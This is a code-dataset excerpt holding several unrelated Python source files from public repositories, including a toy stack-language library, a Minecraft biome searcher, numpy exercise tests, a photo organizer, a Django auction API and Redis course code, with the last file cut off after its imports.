metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "4gboframram/PySenpai",
"score": 3
} |
#### File: senpai_lang/lib/senpai_os.py
```python
from senpai_lang.pyutils import FuncBase, PyModule
import os
class System(FuncBase):
"""
Can take 2 or 1 argument
First argument is always the command to execute.
Second argument can be anything,
Second argument if it exists returns the value os.system()
On Unix, the return value is the exit status of the process encoded in the format specified for wait().
On Windows, the return value is that returned by the system shell after running command. The shell is given by the Windows environment variable COMSPEC: it is usually cmd.exe, which returns the exit status of the command run; on systems using a non-native shell, consult your shell documentation.
"""
name = 'cmd'
def __init__(self):
super().__init__(self.name, self.system)
@staticmethod
def system(*args):
if len(args) == 1:
os.system(*args)
else:
return os.system(args[0])
PyModule('os', [System])
```
#### File: senpai_lang/lib/stack.py
```python
from senpai_lang.pyutils import FuncBase, PyModule
class CurrentStack(FuncBase):
"""Returns a reference to the current stack. Things can get weird..."""
name = "cur"
def __init__(self):
super().__init__(self.name, self.current_stack)
def current_stack(self):
return self.interpreter.stacks.current_stack
class GetStack(FuncBase):
"""Returns a reference to the stack with that name. All changes to that stack will be reflected in the stack returned and vice versa."""
name = "get"
def __init__(self):
super().__init__(self.name, self.get_stack)
def get_stack(self, name):
return self.interpreter.stacks[name]
class SwitchStack(FuncBase):
"""Switch the current stack to a stack with that name. Creates an empty stack if the name does not exist. Essentially the same thing as the builtin instruction, but it can take any hashable object as the key and allows the creation of stacks with undetermined names"""
name = "switch"
def __init__(self):
super().__init__(self.name, self.switch_stack)
def switch_stack(self, name):
self.interpreter.stacks.switch_stack(name)
class DeleteStack(FuncBase):
"""Deletes a stack with a given name"""
name = "del"
def __init__(self):
super().__init__(self.name, self.del_stack)
def del_stack(self, name):
del self.interpreter.stacks[name]
PyModule('stack', [CurrentStack, GetStack, SwitchStack, DeleteStack])
``` |
{
"source": "4gboframram/Pyubiomes",
"score": 3
} |
#### File: Pyubiomes/Pyubiomes/nether.py
```python
from minecraft_nether_gen_rs import NetherGen,create_new_nether,get_biome,NetherBiomes,delete,get_biome_structure,get_biome_decorator
import ctypes
import minecraft_nether_gen_rs
#Huge thanks the Neil for making a commit of minecraft_nether_gen_rs that can be used on an outdated Rust.
#He is the smart one behind the nether shit. I'm just the one asking
#him stupid questions and trying to make the Python simpler
def nether_biome_at_pos(seed: int, x:int, z:int):
'''
Returns
Parameters:
x:
The x-coordinate of the point the searcher will search
z:
The z-coordinate of the point the searcher will search
'''
nether_gen: ctypes.POINTER(NetherGen)=create_new_nether(seed)
return get_biome(nether_gen, x, 64, z)
def nether_biomes_in_area(seed: int, biomes:list, x1:int, z1:int, x2: int, z2: int, incrementor: int=8):
'''
Finds if all of biomes in the list of biomes is in the area. The incrementor is the spacing between the blocks the searcher should check (default=8)
nether_gen,
Returns: bool
'''
if seed<0:
seed+=1<<64
nether_gen: ctypes.POINTER(NetherGen)=create_new_nether(seed)
searchx=x1
searchz=z1
biomes_in_area=[]
biomes_set=set(biomes)
while searchx<=x2:
while searchz<=z2:
biome=get_biome(nether_gen, searchx, 64, searchz)
if not biome in biomes:
biomes_in_area.append(biome)
if biomes_set==set(biomes_in_area):
return True
else: searchz+=incrementor
searchx+=incrementor
return False
``` |
{
"source": "4GeeksAcademy/numpy-100",
"score": 2
} |
#### File: exercises/002-import-numpy/test.py
```python
import os, pytest, re
@pytest.mark.it("Import Numpy as np on the app.py file")
def test_declare_variable():
path = 'app.py'
with open(path, 'r') as content_file:
content = content_file.read()
regex = re.compile(r"import\s+numpy\s+as\s+np")
assert bool(regex.search(content)) == True
```
#### File: exercises/007-change-vector-values/test.py
```python
import pytest
import os
@pytest.mark.it("Use the zeros() function")
def test_output():
f = open('app.py')
content = f.read()
assert content.find("zeros(") > 0
@pytest.mark.it('The output should be a null vector of size 10 and the fifth value should be 1')
def test_print(capsys):
import app
captured = capsys.readouterr()
assert captured.out == '[0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]\n'
```
#### File: exercises/012-identity-matrix/test.py
```python
import pytest
import os
@pytest.mark.it("You have to use the eye() method")
def test_output():
f = open('app.py')
content = f.read()
assert "eye(" in content
@pytest.mark.it('The output should be a matrix which values should be from 0 to 9')
def test_print(capsys):
import app
captured = capsys.readouterr()
assert captured.out == '[[1. 0. 0.]\n [0. 1. 0.]\n [0. 0. 1.]]\n'
``` |
{
"source": "4-geeks/image-sim",
"score": 2
} |
#### File: 4-geeks/image-sim/search.py
```python
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
from PIL import Image
import torchvision.models as models
import torch
from utils import gram_matrix, transform, cos
import pandas as pd
import json
def search(query_pil,model, db='index.json'):
if type(db) == str:
with open(db) as json_file:
data = json.load(json_file)
db = pd.DataFrame(data)
query = transform(query_pil.convert('RGB'))
qFeatures = model(query.unsqueeze(0))
qGram = gram_matrix(qFeatures).flatten()
scores = db['Gram'].apply(lambda x: cos(torch.tensor(x),qGram).item())
name = db['Name'][scores.argmax()]
score = round(scores.max(),3)
return name, score
query_folder = 'queries'
database_folder = 'database'
result_folder = 'results'
db_path = 'index.json'
if not os.path.isdir(result_folder):
os.mkdir(result_folder)
plt.ioff()
if __name__ == "__main__":
simNet = torch.nn.Sequential(*list(models.vgg16(pretrained=True).features.modules())[1:14])
with open(db_path) as json_file:
data = json.load(json_file)
db = pd.DataFrame(data)
queries_list = sorted(glob(os.path.join(query_folder,'*.jpg')) + glob(os.path.join(query_folder,'*.png')))
if not queries_list:
raise ValueError('the [{}] folder is not exist or is empty'.format(query_folder))
for query_path in queries_list:
query_pil = Image.open(query_path)
name, score = search(query_pil, simNet)
match_pil = Image.open(os.path.join(database_folder,name))
fig,ax = plt.subplots(1,2)
ax[0].imshow(query_pil)
ax[1].imshow(match_pil)
plt.savefig(format(os.path.join(result_folder,query_path.split('/')[-1])))
print(query_path ,name, score)
``` |
{
"source": "4-geeks/score_sde_pytorch",
"score": 3
} |
#### File: score_sde_pytorch/models/ema.py
```python
from __future__ import division
from __future__ import unicode_literals
import torch
# Partially based on: https://github.com/tensorflow/tensorflow/blob/r1.13/tensorflow/python/training/moving_averages.py
class ExponentialMovingAverage:
"""
Maintains (exponential) moving average of a set of parameters.
"""
def __init__(self, parameters, decay, use_num_updates=True):
"""
Args:
parameters: Iterable of `torch.nn.Parameter`; usually the result of
`model.parameters()`.
decay: The exponential decay.
use_num_updates: Whether to use number of updates when computing
averages.
"""
if decay < 0.0 or decay > 1.0:
raise ValueError('Decay must be between 0 and 1')
self.decay = decay
self.num_updates = 0 if use_num_updates else None
self.shadow_params = [p.clone().detach()
for p in parameters if p.requires_grad]
self.collected_params = []
def update(self, parameters):
"""
Update currently maintained parameters.
Call this every time the parameters are updated, such as the result of
the `optimizer.step()` call.
Args:
parameters: Iterable of `torch.nn.Parameter`; usually the same set of
parameters used to initialize this object.
"""
decay = self.decay
if self.num_updates is not None:
self.num_updates += 1
decay = min(decay, (1 + self.num_updates) / (10 + self.num_updates))
one_minus_decay = 1.0 - decay
with torch.no_grad():
parameters = [p for p in parameters if p.requires_grad]
for s_param, param in zip(self.shadow_params, parameters):
s_param.sub_(one_minus_decay * (s_param - param))
def copy_to(self, parameters):
"""
Copy current parameters into given collection of parameters.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
updated with the stored moving averages.
"""
parameters = [p for p in parameters if p.requires_grad]
for s_param, param in zip(self.shadow_params, parameters):
if param.requires_grad:
param.data.copy_(s_param.data)
def store(self, parameters):
"""
Save the current parameters for restoring later.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
temporarily stored.
"""
self.collected_params = [param.clone() for param in parameters]
def restore(self, parameters):
"""
Restore the parameters stored with the `store` method.
Useful to validate the model with EMA parameters without affecting the
original optimization process. Store the parameters before the
`copy_to` method. After validation (or model saving), use this to
restore the former parameters.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
updated with the stored parameters.
"""
for c_param, param in zip(self.collected_params, parameters):
param.data.copy_(c_param.data)
def state_dict(self):
return dict(decay=self.decay, num_updates=self.num_updates,
shadow_params=self.shadow_params)
def load_state_dict(self, state_dict):
self.decay = state_dict['decay']
self.num_updates = state_dict['num_updates']
self.shadow_params = state_dict['shadow_params']
``` |
{
"source": "4g/pictorg",
"score": 3
} |
#### File: 4g/pictorg/jobs.py
```python
import random
def create_job_file(src,dest,new_files_dict):
create_mkdir_jobs(src,dest,new_files_dict)
create_copy_jobs(src,dest,new_files_dict)
def create_mkdir_jobs(src,dest,new_files_dict):
with open(src+"/mkdirjobs.jb","w+") as mkdir_job:
for key in new_files_dict:
date = new_files_dict[key][1].replace(':',"/")
dirpath = "mkdir -p " + dest + "/" + date + "\n"
mkdir_job.write(dirpath)
mkdir_job.close()
def create_copy_jobs(src,dest,new_files_dict):
with open(src+"/copyjobs.jb","w+") as copy_job:
for key in new_files_dict:
src_path = new_files_dict[key][0]
date = new_files_dict[key][1].replace(':',"/")
dest_filename = dest + "/" + date + "/" + str(random.randint(1,1000000000)) + "." + src_path.split(".")[-1]
cpstr = "cp " + src_path + " " + dest_filename + "\n"
copy_job.write(cpstr)
copy_job.close()
```
#### File: 4g/pictorg/organizer.py
```python
import sys
from hash import get_hash
from jobs import create_job_file
from exif import get_date
import os
from os.path import join, abspath
def main(argv):
src = argv[0]
dest = argv[1]
new_files_dict = get_new_files_dict(src, dest)
create_job_file(src,dest,new_files_dict)
def get_new_files_dict(src, dest):
dest_dict = get_hash_dict(dest)
src_dict = get_hash_dict(src,dest_dict)
return src_dict
def get_hash_dict(root,dest_dict=None):
hash_dict = dict()
for file_path in get_files(root):
try:
date , hashv = get_date(file_path) , get_hash(file_path)
if dest_dict == None :
hash_dict[hashv] = [file_path , date]
else:
if hashv in dest_dict:
pass
else:
hash_dict[hashv] = [file_path,date]
except:
pass
return hash_dict
def get_files(root):
for dirName, subdirList, fileList in os.walk(root):
for fname in fileList:
path = abspath(join(dirName, fname))
yield path
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "4gra/launchpad.py",
"score": 4
} |
#### File: launchpad.py/examples/ekans.py
```python
from launchpad_py.utils import *
import random
from time import sleep
from collections import deque
pause_btn = 0, 0
pause_colour = 3, 0
play_colour = 1, 0
def neighbours(x, y):
"""
within 0 <= x <= 7 and 1 <= y <= 8 return neighbouring squares
[x-1, y-1] [x, y-1] [x+1, y-1]
[x-1, y] [x, y] [x+1, y]
[x-1, y+1] [x, y+1] [x+1, y+1]
"""
neigh = []
for (nx, ny) in [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]:
if 0 <= nx <= 7 and 1 <= ny <= 8:
neigh += [(nx, ny)]
return neigh
class Snake:
"""
This is a game for ����
love from �����
"""
field_colour = 0, 1
food_colour = 0, 3
head_colour = 3, 0
tail_colour = 2, 0
def __init__(self, lp):
#self.head = 4, 2 # position of the head of the snake
#self.tail = deque([(3, 2), (2, 2), (1, 2), (0, 2)])
self.paused = False
self.head = random.choice(
[(x, y) for x in range(0, 7) for y in range(1, 8)]
)
self.prev = []
self.tail = deque()
self.starting_length = 6
self.food = []
self.lp = lp
def __len__(self):
return len(self.tail) + 1
def pixels(self):
return [self.head] + list(self.tail)
def paint(self):
for pos in [p for p in self.food if p not in self.tail]:
self.lp.LedCtrlXY(*pos, *self.food_colour)
for pos in [p for p in self.prev if p not in self.tail and p not in self.food]:
self.lp.LedCtrlXY(*pos, *self.field_colour)
for pos in self.tail:
self.lp.LedCtrlXY(*pos, *self.tail_colour)
for pos in [self.head]:
self.lp.LedCtrlXY(*pos, *self.head_colour)
def place_food(self, x, y):
if (x, y) not in self.pixels():
self.food += [(x, y)]
def eat(self):
"""
eat food under the snake's head
"""
self.food.pop(
self.food.index(self.head)
)
def move(self, x, y):
"""
moves the snake's head to a new location
this will teleport a 1-length snake to (x,y) if the move is infeasible
"""
self.prev = self.pixels()
self.tail.append(self.head)
if len(self) > self.starting_length:
self.tail.popleft()
# moved
self.head = x, y
if self.head in self.food:
self.eat()
def possible_moves(self, x, y):
return [pos for pos in neighbours(x,y) if pos not in self.pixels()[1:]]
def random_move(self):
"""
Move randomly. The minimal lookahead will work indefinitely for a
snake of length <= 6
"""
self.prev = self.pixels()
self.tail.append(self.head)
if len(self) > self.starting_length:
self.tail.popleft()
# generate new head position choices TODO: do this first and have 'stay still' as a choice
new_heads = [pos for pos in neighbours(*self.head) if pos not in self.tail]
# lookahead one move, that's really all that's required
# we should just special-case the corners but this worked in a pinch
if len(new_heads) == 2:
new_heads = [h for h in new_heads if len(neighbours(*h)) != 2]
choices = list(new_heads)
#print(f"Choices are {choices}, having excluded {self.tail}")
self.head = random.choice(choices)
if self.head in self.food:
self.eat()
def game_loop():
with LaunchpadPlease(emulate=None) as lp:
snake = Snake(lp)
fill(lp, *snake.field_colour)
while True:
if not snake.paused:
snake.random_move()
lp.LedCtrlXY(*pause_btn, *pause_colour)
else:
lp.LedCtrlXY(*pause_btn, *play_colour)
snake.paint()
sleep(0.09)
# process all buttons in one go
if lp.ButtonChanged():
while True:
try:
(x, y, pressed) = lp.ButtonStateXY() # raises ValueError when state is None
print("+" if pressed else "-", x, y)
# momentary pause
#if (x, y) == (0, 0):
# snake.paused = pressed
# continue
if pressed:
# toggle pause
if (x, y) == (0, 0):
snake.paused = (not snake.paused)
continue
snake.place_food(x, y)
except ValueError: # when state == None
break
if __name__ == '__main__':
game_loop()
```
#### File: launchpad.py/launchpad_py/utils.py
```python
import launchpad_py as launchpad
from collections import defaultdict
OFF = (0, 0)
# (1,0): #
# (2,0): #
RED = (3, 0)
YELLOW = (3, 3)
# (0,1): #
# (0,2): #
GREEN = (0, 3)
# (3,1): #
# (2,1): #
# (3,2): #
# (1,3): #
# (1,2): #
# (2,3): #
# (2,2): #
# (1,1):
def tweak(rg):
"""
makes the most minimally visible change to a colour.
there's a mathematically neat way of doing this that evades me right now
(i.e. don't change r/g ratios except if one of them is zero.)
"""
(r, g) = rg
if r == 0 and g == 0:
return 0, 0
elif r == 1 and g == 1:
return 2, 2
elif r == 0:
if g == 1:
g += 1
else:
g -= 1
elif g == 0:
if r == 1:
r += 1
else:
r -= 1
else:
r -= 1
g -= 1
return r, g
class Colour:
"""
colour class.
experimental opacity or something?
TODO: hand-crafted mappings for each colour, because there's
no real correspondence between RGB and some LEDs.
"""
def __init__(self, r, g, o=1):
self.r = r
self.g = g
self.o = o
def tweak(self):
return tweak((self.r, self.g))
def rg(self):
return self.r, self.g
def rgbhex(self):
#diff = max(3-abs(self.r-self.g), 2)
b = 3 - (self.r + self.g)
return "#{:02x}{:02x}00".format(self.r*85, self.g*85, b*85)
def fill(lp, r, g, every_led=False):
"""fills the board with a single colour"""
if every_led:
raise NotImplementedError
for x in range(8):
for y in range(1, 9):
lp.LedCtrlXY(x, y, r, g)
class CachingLaunchpad(launchpad.Launchpad):
"""
a launchpad wrapper that stores last colour results.
Unfinished; probably will be merged into the LaunchpadEmu
"""
led = defaultdict(lambda: (0, 0)) # LED states
btn = {} # button states??
PRINT_CTR = None
ctr = 0
def __init__(self, print_ctr=500):
self.print_ctr = print_ctr
self.ctr = 0
super(CachingLaunchpad, self).__init__()
def LedCtrlXY(self, x, y, r, g):
# self.led[(x,y)] = Colour(r,g)
self.led[(x, y)] = (r, g)
if self.PRINT_CTR is not None and self.ctr > self.PRINT_CTR:
self.ctr = 0
print(self)
else:
self.ctr += 1
return super(CachingLaunchpad, self).LedCtrlXY(x, y, r, g)
# noinspection PyPep8Naming
def LedGetXY(self, x, y):
return self.led[(x, y)]
def __getitem__(self, xy):
return self.LedGetXY(*xy)
def cell_value(self, x, y):
"""
Prints out a representation of a cell value.
TODO: use ANSI colours.
"""
if x == 8 and y == 0:
return "--"
(r, g) = self[(x, y)]
return "%s%s" % (r, g)
def __repr__(self):
"""
Prints out a representation of the board.
"""
out = "\n"
for y in range(9):
out += "+--+--+--+--+--+--+--+--+--+\n"
out += ("|" + "|".join([self.cell_value(x, y) for x in range(9)]) + "|\n")
out += "+--+--+--+--+--+--+--+--+--+\n"
return out
class LaunchpadPlease:
"""
Makes a launchpad connection, and handles setup/shutdown in a 'with' block.
Opens an emulator (LaunchpadEmu) if none is available.
TODO: save/restore state :)
Usage: with LaunchPadPlease() as lp: [...]
"""
def __init__(self, reset_on_close=False, emulate=False):
"""
:param reset_on_close: reset display (to zero) once application quits?
:param emulate: always use the emulator
"""
self.reset_on_close = reset_on_close
self.always_emulate = emulate
def __enter__(self):
self.lp = None
if self.always_emulate is True:
self.lp = LaunchpadEmu()
else:
try:
self.lp = launchpad.Launchpad()
self.lp.Open()
self.lp.ButtonFlush()
except:
if self.always_emulate is not False:
self.lp = launchpad.LaunchpadEmu()
return self.lp
def __exit__(self, type, value, traceback):
print("exiting with %s, %s, %s" % (type, value, traceback))
if self.reset_on_close:
self.lp.Reset() # turn all LEDs off
self.lp.Close() # close the Launchpad (will quit with an error due to a PyGame bug)
class Timer:
"""
something something a timer
"""
SLEEP_TIME = 5000
def __init__(self, lp):
self.ticks = 0
self.lp = lp
self.sleep = False
self.blink = False
def draw(self):
"""
sets sleep mode.
"""
if not self.sleep:
return
# blank screen
# blink
def inc(self):
self.ticks += 1
if self.ticks >= self.SLEEP_TIME:
self.sleep = True
``` |
{
"source": "4gra/pytradfri",
"score": 3
} |
#### File: pytradfri/device/blind.py
```python
from pytradfri.const import ATTR_START_BLINDS, \
ATTR_BLIND_CURRENT_POSITION
class Blind:
"""Represent a blind."""
def __init__(self, device, index):
self.device = device
self.index = index
@property
def raw(self):
"""Return raw data that it represents."""
return self.device.raw[ATTR_START_BLINDS][self.index]
@property
def current_cover_position(self):
"""Get the current position of the blind."""
return self.raw.get(ATTR_BLIND_CURRENT_POSITION)
```
#### File: pytradfri/tests/test_util.py
```python
from pytradfri.error import PytradfriError
from pytradfri.util import load_json, save_json, BitChoices
import shutil
import tempfile
from os import path
import unittest
from unittest.mock import patch
import json
import pytest
class UtilTestsBitChoices(unittest.TestCase):
def test_bitchoices(self):
WEEKDAYS = BitChoices(
(
('tue', 'Tuesday'),
)
)
assert WEEKDAYS.get_selected_keys(1) == ['tue']
assert len(WEEKDAYS) == 1
assert [x for x in WEEKDAYS] == [(1, 'Tuesday')]
class UtilTestsJSON(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_json_save(self):
FILENAME = path.join(self.test_dir, 'sample_psk_file.txt')
conf = {'identity': 'pytradfri',
'key': '123abc'}
written_file = save_json(FILENAME, conf)
self.assertTrue(written_file)
def test_json_load(self):
f = open(path.join(self.test_dir, 'sample_psk_file2.txt'), 'w')
config = {'identity': 'hashstring',
'key': 'secretkey'}
data = json.dumps(config, sort_keys=True, indent=4)
f.write(data)
f.close()
json_data = load_json(path.join(self.test_dir,
'sample_psk_file2.txt'))
self.assertEqual(json_data,
{'identity': 'hashstring', 'key': 'secretkey'})
def test_load_file_not_found(self):
assert not load_json(path.join(self.test_dir, 'not_a_file'))
def test_load_not_json(self):
f = open(path.join(self.test_dir, 'sample_psk_file3.txt'), 'w')
data = '{not valid json'
f.write(data)
f.close()
with pytest.raises(PytradfriError):
load_json(path.join(self.test_dir, 'sample_psk_file3.txt'))
def test_save_not_serializable(self):
FILENAME = path.join(self.test_dir, 'should_not_save')
conf = b'bytes are not serializable'
with pytest.raises(PytradfriError):
save_json(FILENAME, conf)
def test_os_error(self):
with patch("builtins.open", side_effect=OSError(-1)):
with pytest.raises(PytradfriError):
load_json('whatever')
with pytest.raises(PytradfriError):
save_json('whatever', {})
``` |
{
"source": "4heck/auction_backend",
"score": 2
} |
#### File: auction_api/views/auction.py
```python
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from auction_api.models import Auction
from auction_api.serializers.auction import AuctionSerializer
from auction_api.services.email import send_new_auction_notifications
class AuctionAPIView(GenericAPIView):
permission_classes = [IsAuthenticated]
serializer_class = AuctionSerializer
queryset = Auction.objects.all()
def post(self, request):
serializer = self.serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
auction_instance = serializer.save()
send_new_auction_notifications(auction_instance)
return Response(serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
manual_parameters=[
openapi.Parameter(name="all", in_="query", type=openapi.TYPE_BOOLEAN),
openapi.Parameter(
name="only_active", in_="query", type=openapi.TYPE_BOOLEAN
),
openapi.Parameter(
name="only_closed", in_="query", type=openapi.TYPE_BOOLEAN
),
]
)
def get(self, request):
if len(request.query_params) > 1:
return Response(
"Using more than one parameter is not allowed",
status=status.HTTP_400_BAD_REQUEST,
)
if request.query_params.get("only_active") == "true":
self.queryset = self.get_queryset().is_active()
elif request.query_params.get("only_closed") == "true":
self.queryset = self.get_queryset().is_closed()
return Response(
self.serializer_class(instance=self.get_queryset(), many=True).data
)
``` |
{
"source": "4heck/ru102py",
"score": 2
} |
#### File: 4heck/ru102py/conftest.py
```python
import pytest
from redis import client as redis_client
from redisolar import create_app
from redisolar.core.connections import get_redis_connection
from redisolar.core.connections import get_redis_timeseries_connection
from redisolar.dao.redis.key_schema import KeySchema
TEST_CONFIG = 'testing.cfg'
CI_CONFIG = 'ci.cfg'
def pytest_addoption(parser):
parser.addoption(
"--ci",
action="store_true",
help="use the CI configuration",
)
def make_app(request, config):
"""Yield a Flask app from the config file specified in `config`."""
if request.config.getoption('ci'):
config = CI_CONFIG
app = create_app(config)
with app.app_context():
yield app
@pytest.fixture
def app(request):
yield from make_app(request, TEST_CONFIG)
@pytest.fixture
def client(app):
with app.test_client() as client:
yield client
@pytest.fixture
def redis(app):
yield get_redis_connection(app.config['REDIS_HOST'], app.config['REDIS_PORT'])
@pytest.fixture
def redis_timeseries(app):
yield get_redis_timeseries_connection(app.config['REDIS_HOST'],
app.config['REDIS_PORT'])
@pytest.fixture
def key_schema(app):
yield KeySchema(app.config['REDIS_KEY_PREFIX'])
def _delete_test_keys(prefix: str, conn: redis_client.Redis):
for key in conn.scan_iter(f"{prefix}:*"):
conn.delete(key)
@pytest.fixture(scope="function", autouse=True)
def delete_test_keys(request):
def cleanup():
app = next(make_app(request, TEST_CONFIG))
conn = get_redis_connection(app.config['REDIS_HOST'], app.config['REDIS_PORT'])
_delete_test_keys(app.config['REDIS_KEY_PREFIX'], conn)
request.addfinalizer(cleanup)
```
#### File: redisolar/api/meter_reading.py
```python
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
from flask_restful import Resource
from marshmallow import fields
from webargs.flaskparser import use_args
from redisolar.api.base import DaoResource
from redisolar.models import MeterReading
from redisolar.schema import MeterReadingsSchema
MAX_RECENT_FEEDS = 1000
DEFAULT_RECENT_FEEDS = 100
def get_feed_count(count: Optional[int]):
"""Decide a safe number of feeds to return."""
if count is None or count < 0:
return DEFAULT_RECENT_FEEDS
if count > MAX_RECENT_FEEDS:
return MAX_RECENT_FEEDS
return count
class GlobalMeterReadingResource(Resource):
"""A RESTful resource representing meter readings for all sites."""
def __init__(self, meter_reading_dao: Any, feed_dao: Any):
self.meter_reading_dao = meter_reading_dao
self.feed_dao = feed_dao
@use_args(MeterReadingsSchema)
def post(self, meter_readings: Dict[str, List[MeterReading]]) -> Tuple[str, int]:
"""Create a new meter reading."""
for reading in meter_readings['readings']:
self.meter_reading_dao.add(reading)
return "Accepted", 202
@use_args({"count": fields.Int()}, location="query")
def get(self, args: Dict[str, int]) -> Dict[str, Dict]:
"""Get a list of meter readings."""
count = args.get('count')
readings = self.feed_dao.get_recent_global(get_feed_count(count))
return MeterReadingsSchema().dump({"readings": readings})
class SiteMeterReadingResource(DaoResource):
"""A RESTful resource representing meter readings for specific sites."""
@use_args({"count": fields.Int()}, location="query")
def get(self, args, site_id):
"""Get recent meter readings for a specific site."""
count = args.get('count')
readings = self.dao.get_recent_for_site(site_id, get_feed_count(count))
return MeterReadingsSchema().dump({"readings": readings})
```
#### File: redisolar/api/site_geo.py
```python
from flask_restful import abort
from marshmallow import validate
from webargs import fields
from webargs.flaskparser import use_args
from redisolar.api.base import DaoResource
from redisolar.models import Coordinate
from redisolar.models import GeoQuery
from redisolar.models import GeoUnit
from redisolar.schema import SiteSchema
DEFAULT_RADIUS = 10.0
DEFAULT_GEO_UNIT = GeoUnit.KM
SITE_LIST_ARGS = {
"lat":
fields.Str(),
"lng":
fields.Str(),
"radius":
fields.Float(missing=DEFAULT_RADIUS),
"radius_unit":
fields.Str(missing=DEFAULT_GEO_UNIT.value,
validate=validate.OneOf([u.value for u in GeoUnit])),
"only_excess_capacity":
fields.Bool(missing=False)
}
class SiteGeoListResource(DaoResource):
@use_args(SITE_LIST_ARGS, location='query')
def get(self, args):
lng = args.get('lng')
lat = args.get('lat')
no_coordinates = lng is None and lat is None
coordinates_provided = lng is not None and lat is not None
if no_coordinates:
return SiteSchema(many=True).dump(self.dao.find_all())
if coordinates_provided:
coord = Coordinate(lng=lng, lat=lat)
query = GeoQuery(coordinate=coord,
radius=args['radius'],
radius_unit=GeoUnit(args['radius_unit']),
only_excess_capacity=args['only_excess_capacity'])
return SiteSchema(many=True).dump(self.dao.find_by_geo(query))
return 404
class SiteGeoResource(DaoResource):
def get(self, site_id):
site = self.dao.find_by_id(site_id)
if not site:
return abort(404, message=f"Site {site_id} does not exist")
return SiteSchema().dump(site)
```
#### File: dao/redis/base.py
```python
from redis.client import Redis
from redisolar.dao.redis.key_schema import KeySchema
class RedisDaoBase:
"""Shared functionality for Redis DAO classes."""
def __init__(self,
redis_client: Redis,
key_schema: KeySchema = None, **kwargs) -> None:
self.redis = redis_client
if key_schema is None:
key_schema = KeySchema()
self.key_schema = key_schema
```
#### File: dao/redis/metric_timeseries.py
```python
import datetime
from itertools import islice
from typing import List
import redis
from redisolar.dao.base import MetricDaoBase
from redisolar.dao.redis.base import RedisDaoBase
from redisolar.models import Measurement
from redisolar.models import MeterReading
from redisolar.models import MetricUnit
RETENTION_MS = 60 * 60 * 24 * 14 * 1000
def unix_milliseconds(time):
return int(time.timestamp() * 1000)
class MetricDaoRedisTimeseries(MetricDaoBase, RedisDaoBase):
def insert(self, meter_reading: MeterReading, **kwargs) -> None:
pipeline = kwargs.get('pipeline')
execute = False
if pipeline is None:
execute = True
pipeline = self.redis.pipeline()
self.insert_metric(meter_reading.site_id, meter_reading.wh_generated,
MetricUnit.WH_GENERATED, meter_reading.timestamp, pipeline)
self.insert_metric(meter_reading.site_id, meter_reading.wh_used,
MetricUnit.WH_USED, meter_reading.timestamp, pipeline)
self.insert_metric(meter_reading.site_id, meter_reading.temp_c,
MetricUnit.TEMP_CELSIUS, meter_reading.timestamp, pipeline)
if execute:
pipeline.execute()
def insert_metric(self, site_id: int, value: float, unit: MetricUnit,
time: datetime.datetime, pipeline: redis.client.Pipeline):
metric_key = self.key_schema.timeseries_key(site_id, unit)
time_ms = unix_milliseconds(time)
self.redis.add(metric_key, time_ms, value, RETENTION_MS) # type: ignore
def get_recent(self, site_id: int, unit: MetricUnit, time: datetime.datetime,
limit: int, **kwargs) -> List[Measurement]:
metric_key = self.key_schema.timeseries_key(site_id, unit)
time_ms = unix_milliseconds(time)
initial_timestamp = time_ms - (limit * 60) * 1000
values = self.redis.range(metric_key, initial_timestamp, time_ms) # type: ignore
return [
Measurement(site_id=site_id,
metric_unit=unit,
timestamp=value[0] / 1000,
value=value[1]) for value in islice(values, limit)
]
```
#### File: tests/scripts/test_update_if_lowest.py
```python
import pytest
from redisolar.scripts.update_if_lowest import UpdateIfLowestScript
def test_update_if_lowest(redis):
redis.set("test-lua", "100")
script = UpdateIfLowestScript(redis)
result = script.update_if_lowest("test-lua", 50)
assert result is True
assert redis.get("test-lua") == "50"
def test_update_if_lowest_unchanged(redis):
redis.set("test-lua", "100")
script = UpdateIfLowestScript(redis)
result = script.update_if_lowest("test-lua", "200")
assert result is False
assert redis.get("test-lua") == "100"
``` |
{
"source": "4hlberg/currenttime",
"score": 3
} |
#### File: currenttime/service/currenttime.py
```python
from flask import Flask, request, Response
import os
import requests
import logging
import json
import dotdictify
app = Flask(__name__)
logger = None
format_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logger = logging.getLogger('currenttime-rest-service')
# Log to stdout
stdout_handler = logging.StreamHandler()
stdout_handler.setFormatter(logging.Formatter(format_string))
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
class DataAccess:
#main get function, will probably run most via path:path
def __get_all_paged_entities(self, path, args):
logger.info("Fetching data from url: %s", path)
url = os.environ.get("base_url") + path
req = requests.get(url, headers={"Accept":"Application/json", "Authorization": "Basic " + os.environ.get('basic_token')})
if req.status_code != 200:
logger.error("Unexpected response status code: %d with response text %s" % (req.status_code, req.text))
raise AssertionError ("Unexpected response status code: %d with response text %s"%(req.status_code, req.text))
res = dotdictify.dotdictify(json.loads(req.text))
for entity in res['value']:
yield(entity)
logger.info('Returning entities')
def get_entities(self,path, args):
print("getting all entities")
return self.__get_all_paged_entities(path, args)
data_access_layer = DataAccess()
def stream_json(entities):
first = True
yield '['
for i, row in enumerate(entities):
if not first:
yield ','
else:
first = False
yield json.dumps(row)
yield ']'
@app.route("/<path:path>", methods=["GET", "POST"])
def get(path):
entities = data_access_layer.get_entities(path, args=request.args)
return Response(
stream_json(entities),
mimetype='application/json'
)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', threaded=True, port=os.environ.get('port',5000))
``` |
{
"source": "4hmedSamir/Openstack-Auto-Backup",
"score": 2
} |
#### File: 4hmedSamir/Openstack-Auto-Backup/main.py
```python
import os
from time import sleep
import subprocess
import logging
import glob
import db
import keystoneclient.v2_0.client as ksclient
from novaclient import client as novaclient
import glanceclient
